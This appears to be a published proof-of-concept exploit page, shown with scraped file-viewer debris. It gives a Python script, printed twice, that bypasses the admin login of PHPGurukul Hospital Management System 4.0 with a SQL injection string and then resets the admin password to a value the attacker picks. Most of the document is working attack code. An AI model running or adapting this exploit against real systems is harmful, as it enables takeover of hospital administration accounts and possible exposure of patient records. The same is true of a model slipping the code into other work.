116 lines
No EOL
3.5 KiB
Python
Executable file
116 lines
No EOL
3.5 KiB
Python
Executable file
# Exploit Title: Hospital Management System 4.0 - Authentication Bypass
|
|
# Exploit Author: Metin Yunus Kandemir (kandemir)
|
|
# Vendor Homepage: https://phpgurukul.com/
|
|
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
|
|
# Version: v4.0
|
|
# Category: Webapps
|
|
# Tested on: Xampp for Windows
|
|
|
|
# Description:
|
|
# Password and username parameters have sql injection vulnerability on admin panel.
|
|
# username: joke' or '1'='1 , password: joke' or '1'='1
|
|
# Exploit changes password of admin user.
|
|
|
|
|
|
|
|
#!/usr/bin/python
|
|
|
|
import requests
|
|
import sys
|
|
|
|
|
|
if (len(sys.argv) !=2) or sys.argv[1] == "-h":
|
|
print "[*] Usage: PoC.py rhost/rpath"
|
|
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
|
|
npasswd = str(raw_input("Please enter at least six characters for new password: "))
|
|
|
|
url = "http://"+rhost+"/hms/admin/index.php"
|
|
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}
|
|
|
|
|
|
#login
|
|
|
|
with requests.Session() as session:
|
|
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
|
|
|
|
#check authentication bypass
|
|
|
|
check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
|
|
print ("[*] Status code: %s"%check.status_code)
|
|
|
|
if check.status_code == 200:
|
|
print "[+] Authentication bypass was successful!"
|
|
print "[+] Trying to change password."
|
|
elif check.status_code == 404:
|
|
print "[-] One bad day! Check target web application path."
|
|
sys.exit()
|
|
else:
|
|
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
|
|
sys.exit()
|
|
|
|
#change password
|
|
|
|
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
|
|
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
|
|
if cgpasswd.status_code == 200:
|
|
print ("[+] Username is: admin")
|
|
print ("[+] New password is: %s"%npasswd)
|
|
else:
|
|
print "[-] One bad day! Try it manually."
|
|
sys.exit()
|
|
|
|
hospital_poc.py
|
|
|
|
#!/usr/bin/python
|
|
|
|
import requests
|
|
import sys
|
|
|
|
|
|
if (len(sys.argv) !=2) or sys.argv[1] == "-h":
|
|
print "[*] Usage: PoC.py rhost/rpath"
|
|
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
|
|
npasswd = str(raw_input("Please enter at least six characters for new password: "))
|
|
|
|
url = "http://"+rhost+"/hms/admin/index.php"
|
|
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}
|
|
|
|
|
|
#login
|
|
|
|
with requests.Session() as session:
|
|
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
|
|
|
|
#check authentication bypass
|
|
|
|
check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
|
|
print ("[*] Status code: %s"%check.status_code)
|
|
|
|
if check.status_code == 200:
|
|
print "[+] Authentication bypass was successful!"
|
|
print "[+] Trying to change password."
|
|
elif check.status_code == 404:
|
|
print "[-] One bad day! Check target web application path."
|
|
sys.exit()
|
|
else:
|
|
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
|
|
sys.exit()
|
|
|
|
#change password
|
|
|
|
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
|
|
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
|
|
if cgpasswd.status_code == 200:
|
|
print ("[+] Username is: admin")
|
|
print ("[+] New password is: %s"%npasswd)
|
|
else:
|
|
print "[-] One bad day! Try it manually."
|
|
sys.exit() |